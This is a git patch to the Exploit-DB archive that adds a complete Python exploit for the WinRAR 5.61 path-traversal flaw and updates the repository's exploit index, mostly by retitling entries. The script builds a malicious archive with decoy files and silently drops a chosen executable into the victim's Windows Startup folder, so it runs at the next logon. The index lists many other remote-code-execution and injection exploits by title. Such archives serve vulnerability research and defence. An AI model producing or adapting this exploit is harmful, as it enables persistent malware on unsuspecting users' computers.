From ab4683fee8c7f710156238e59a465b080a248ab1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 17 Mar 2019 05:01:51 +0000 Subject: [PATCH] DB: 2019-03-17 1 changes to exploits/shellcodes WinRAR 5.61 - Path Traversal Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit) Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit) Splunk Enterprise 7.2.3 - Authenticated Custom App RCE Splunk Enterprise 7.2.3 - (Authenticated) Custom App Remote Code Execution LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference VA MAX 8.3.4 - Authenticated Remote Code Execution VA MAX 8.3.4 - (Authenticated) Remote Code Execution WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload --- exploits/windows/local/46552.py | 118 ++++++++++++++++++++++++++++++++ files_exploits.csv | 15 ++-- 2 files changed, 126 insertions(+), 7 deletions(-) create mode 100755 exploits/windows/local/46552.py diff --git a/exploits/windows/local/46552.py b/exploits/windows/local/46552.py new file mode 100755 index 000000000..9db767f0b --- /dev/null +++ b/exploits/windows/local/46552.py @@ -0,0 +1,118 @@ +#!/usr/bin/env python3 + +import os +import re +import zlib +import binascii + +# The archive filename you want +rar_filename = "test.rar" +# The evil file you want to run +evil_filename = "calc.exe" +# The decompression path you want, such shown below +target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe" +# Other files to be displayed when the victim opens the winrar +# filename_list=[] +filename_list = ["hello.txt", "world.txt"] + +class AceCRC32: + def __init__(self, buf=b''): + self.__state = 0 + if len(buf) > 0: + self += buf + + def __iadd__(self, buf): + self.__state = zlib.crc32(buf, self.__state) + return self + + def __eq__(self, other): + return self.sum == other + + def __format__(self, format_spec): + return self.sum.__format__(format_spec) + + def __str__(self): + return "0x%08x" % self.sum + + @property + def sum(self): + return self.__state ^ 0xFFFFFFFF + +def ace_crc32(buf): + return AceCRC32(buf).sum + +def get_ace_crc32(filename): + with open(filename, 'rb') as f: + return ace_crc32(f.read()) + +def get_right_hdr_crc(filename): + # This command may be different, it depends on the your Python3 environment. + p = os.popen('py -3 acefile.py --headers %s'%(filename)) + res = p.read() + pattern = re.compile('right_hdr_crc : 0x(.*?) | struct') + result = pattern.findall(res) + right_hdr_crc = result[0].upper() + return hex2raw4(right_hdr_crc) + +def modify_hdr_crc(shellcode, filename): + hdr_crc_raw = get_right_hdr_crc(filename) + shellcode_new = shellcode.replace("6789", hdr_crc_raw) + return shellcode_new + +def hex2raw4(hex_value): + while len(hex_value) < 4: + hex_value = '0' + hex_value + return hex_value[2:] + hex_value[:2] + +def hex2raw8(hex_value): + while len(hex_value) < 8: + hex_value = '0' + hex_value + return hex_value[6:] + hex_value[4:6] + hex_value[2:4] + hex_value[:2] + +def get_file_content(filename): + with open(filename, 'rb') as f: + return str(binascii.hexlify(f.read()))[2:-1] # [2:-1] to remote b'...' + +def make_shellcode(filename, target_filename): + if target_filename == "": + target_filename = filename + hdr_crc_raw = "6789" + hdr_size_raw = hex2raw4(str(hex(len(target_filename)+31))[2:]) + packsize_raw = hex2raw8(str(hex(os.path.getsize(filename)))[2:]) + origsize_raw = packsize_raw + crc32_raw = hex2raw8(str(hex(get_ace_crc32(filename)))[2:]) + filename_len_raw = hex2raw4(str(hex(len(target_filename)))[2:]) + filename_raw = "".join("{:x}".format(ord(c)) for c in target_filename) + content_raw = get_file_content(filename) + shellcode = hdr_crc_raw + hdr_size_raw + "010180" + packsize_raw \ + + origsize_raw + "63B0554E20000000" + crc32_raw + "00030A005445"\ + + filename_len_raw + filename_raw + "01020304050607080910A1A2A3A4A5A6A7A8A9" + return shellcode + +def build_file(shellcode, filename): + with open(filename, "wb") as f: + f.write(binascii.a2b_hex(shellcode.upper())) + +def build_file_add(shellcode, filename): + with open(filename, "ab+") as f: + f.write(binascii.a2b_hex(shellcode.upper())) + +def build_file_once(filename, target_filename=""): + shellcode = make_shellcode(filename, target_filename) + build_file_add(shellcode, rar_filename) + shellcode_new = modify_hdr_crc(shellcode, rar_filename) + content_raw = get_file_content(rar_filename).upper() + build_file(content_raw.replace(shellcode.upper(), shellcode_new.upper()).replace("01020304050607080910A1A2A3A4A5A6A7A8A9", get_file_content(filename)), rar_filename) + +if __name__ == '__main__': + print("[*] Start to generate the archive file %s..."%(rar_filename)) + + shellcode_head = "6B2831000000902A2A4143452A2A141402001018564E974FF6AA00000000162A554E524547495354455245442056455253494F4E2A" + build_file(shellcode_head, rar_filename) + + for i in range(len(filename_list)): + build_file_once(filename_list[i]) + + build_file_once(evil_filename, target_filename) + + print("[+] Evil archive file %s generated successfully !"%(rar_filename)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 59ba5898f..ff54ce585 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10359,6 +10359,7 @@ id,file,description,date,author,type,platform,port 46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware, 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows, 46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows, +46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17240,7 +17241,7 @@ id,file,description,date,author,type,platform,port 46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution",2019-02-18,ProofOfCalc,remote,windows, 46436,exploits/hardware/remote/46436.rb,"Belkin Wemo UPnP - Remote Code Execution (Metasploit)",2019-02-20,Metasploit,remote,hardware, 46444,exploits/hardware/remote/46444.txt,"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass",2019-02-21,"Jacob Baines",remote,hardware, -46449,exploits/windows/remote/46449.rb,"Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)",2019-02-22,Metasploit,remote,windows,5180 +46449,exploits/windows/remote/46449.rb,"Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit)",2019-02-22,Metasploit,remote,windows,5180 46469,exploits/hardware/remote/46469.py,"Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow",2019-02-28,"Artem Metla",remote,hardware, 46501,exploits/java/remote/46501.py,"Java Debug Wire Protocol (JDWP) - Remote Code Execution",2016-12-20,IOactive,remote,java, 46506,exploits/hardware/remote/46506.rb,"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)",2019-03-07,AkkuS,remote,hardware, @@ -40859,7 +40860,7 @@ id,file,description,date,author,type,platform,port 46234,exploits/php/webapps/46234.txt,"Joomla! Component JHotelReservation 6.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80 46235,exploits/php/webapps/46235.txt,"SimplePress CMS 1.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80 46237,exploits/cgi/webapps/46237.txt,"SirsiDynix e-Library 3.5.x - Cross-Site Scripting",2019-01-24,AkkuS,webapps,cgi,80 -46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - Authenticated Custom App RCE",2019-01-24,"Lee Mazzoleni",webapps,windows,8000 +46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - (Authenticated) Custom App Remote Code Execution",2019-01-24,"Lee Mazzoleni",webapps,windows,8000 46239,exploits/php/webapps/46239.txt,"ImpressCMS 1.3.11 - 'bid' SQL Injection",2019-01-24,"Mehmet Onder",webapps,php,80 46240,exploits/hardware/webapps/46240.html,"Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery",2019-01-24,"Ali Can Gönüllü",webapps,hardware,80 46243,exploits/hardware/webapps/46243.txt,"Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection",2019-01-25,"RedTeam Pentesting",webapps,hardware, @@ -40869,7 +40870,7 @@ id,file,description,date,author,type,platform,port 46251,exploits/java/webapps/46251.txt,"Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting",2019-01-28,"Ishaq Mohammed",webapps,java,80 46252,exploits/php/webapps/46252.txt,"WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download",2019-01-28,41!kh4224rDz,webapps,php,80 46253,exploits/hardware/webapps/46253.html,"AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery",2019-01-28,"Ali Can Gönüllü",webapps,hardware,80 -46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple, +46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple, 46259,exploits/php/webapps/46259.txt,"CMSsite 1.0 - 'cat_id' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80 46260,exploits/php/webapps/46260.txt,"CMSsite 1.0 - 'search' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80 46262,exploits/hardware/webapps/46262.py,"Cisco RV300 / RV320 - Information Disclosure",2019-01-28,"Harom Ramos",webapps,hardware, @@ -40906,7 +40907,7 @@ id,file,description,date,author,type,platform,port 46438,exploits/php/webapps/46438.txt,"C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection",2019-02-21,"Carlos Avila",webapps,php, 46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443 46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80 -46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php, +46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - (Authenticated) Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php, 46349,exploits/linux/webapps/46349.txt,"CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting",2019-02-11,DKM,webapps,linux, 46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80 46351,exploits/php/webapps/46351.txt,"OPNsense < 19.1.1 - Cross-Site Scripting",2019-02-12,"Ozer Goker",webapps,php,80 @@ -40922,7 +40923,7 @@ id,file,description,date,author,type,platform,port 46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80 46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80 46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80 -46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80 +46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection",2019-02-14,B0UG,webapps,php,80 46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80 46384,exploits/php/webapps/46384.txt,"MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2019-02-15,0xB9,webapps,php,80 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python, @@ -40981,7 +40982,7 @@ id,file,description,date,author,type,platform,port 46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php, 46525,exploits/multiple/webapps/46525.rb,"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,multiple, 46526,exploits/jsp/webapps/46526.rb,"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,jsp, -46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80 +46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80 46528,exploits/php/webapps/46528.py,"Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution",2019-03-11,redtimmysec,webapps,php, 46531,exploits/php/webapps/46531.html,"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)",2019-03-12,"Gionathan Reale",webapps,php,80 46537,exploits/php/webapps/46537.txt,"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion",2019-03-13,"Manuel García Cárdenas",webapps,php,80 @@ -40989,7 +40990,7 @@ id,file,description,date,author,type,platform,port 46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php, 46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80 46545,exploits/multiple/webapps/46545.txt,"NetData 1.13.0 - HTML Injection",2019-03-15,s4vitar,webapps,multiple, -46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80 +46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80 46548,exploits/php/webapps/46548.txt,"ICE HRM 23.0 - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80 46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80 46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80